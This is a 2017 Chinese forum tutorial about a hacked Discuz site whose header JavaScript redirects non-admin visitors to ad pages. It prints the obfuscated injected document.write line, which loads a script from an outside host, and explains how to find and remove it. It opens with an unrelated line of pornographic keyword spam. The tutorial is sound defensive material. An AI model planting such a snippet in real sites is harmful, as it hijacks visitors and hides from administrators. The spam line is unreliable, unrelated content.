四虎影视在线影院在线观看,小s货再浪些再咬紧点h,国产精品水嫩水嫩,97精产国品一二三产区

標(biāo)題: [教程] discuz網(wǎng)站被掛馬，非管理員訪問自動(dòng)跳轉(zhuǎn)到廣告頁面怎么解決 [打印本頁]

作者: 向上的蔥子 時(shí)間: 2017-4-27 15:06 標(biāo)題: discuz網(wǎng)站被掛馬，非管理員訪問自動(dòng)跳轉(zhuǎn)到廣告頁面怎么解決

你是否遇到過你的網(wǎng)站打開一會(huì)就自動(dòng)跳轉(zhuǎn)到其他頁面，而且這個(gè)問題是你的用戶告訴你的，而你自己卻沒有遇到？
QQ截圖20170427140904.png

discuz掛馬彈出頁面

經(jīng)過蔥子我細(xì)心的對(duì)掛馬網(wǎng)站做排查，終于讓我找到了問題所在。

掛馬者是通過在discuz的頭部js文件里面添加了劫持js代碼，通過判斷訪問者的IP來實(shí)現(xiàn)不同跳轉(zhuǎn)的。

具體代碼如下：

document.write("<\163"+"cript src='http://\141"+"d.\172"+"om"+"12\63"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'><\/s"+"cript>");

可以看出，后面有個(gè)“chengdu”代碼，這段代碼的意思就是IP為成都地區(qū)的訪問者在訪問被掛馬頁面時(shí)不做跳轉(zhuǎn)。其余地區(qū)的IP訪問者則跳轉(zhuǎn)。

從這段代碼我們就可以看出掛馬者是多么的用心險(xiǎn)惡。

他首先根據(jù)你網(wǎng)站所在地進(jìn)行判斷網(wǎng)站管理員經(jīng)常使用的IP地址所在地，然后有針對(duì)性的對(duì)網(wǎng)站管理員不做跳轉(zhuǎn)劫持。

所以，這種劫持的情況下，網(wǎng)站管理者非常難以發(fā)現(xiàn)到網(wǎng)站被掛馬了。

解決辦法也比較簡(jiǎn)單：

首先校驗(yàn)下原始文件，對(duì)比下哪些js文件近期有被改動(dòng)過，然后針對(duì)被改動(dòng)過的js文件做以上代碼段的排除。找到以上代碼段后，刪除即可。

最后說一下，各位網(wǎng)站管理者一定要注意保管好網(wǎng)站和服務(wù)器的管理密碼，盡量設(shè)置的復(fù)雜一點(diǎn)。同時(shí)也要及時(shí)檢測(cè)服務(wù)器是否存在漏洞等，及時(shí)做針對(duì)性處理，以避免類似的事情再發(fā)生。

以上文章為向上的蔥子原創(chuàng)，轉(zhuǎn)載請(qǐng)注明出處。

原文地址：http://www.aitiancheng.com/article-491.html

圖片附件: QQ截圖20170427140904.png (2017-4-27 15:06, 5.52 KB) / 下載次數(shù) 9835
http://cd-genova.com/bbs/attachment.php?aid=7233&k=8b1f47175b79f7f8e093eea28bb91ec4&t=1744966263&sid=hy8rz6

歡迎光臨 WDlinux官方論壇 (http://cd-genova.com/bbs/)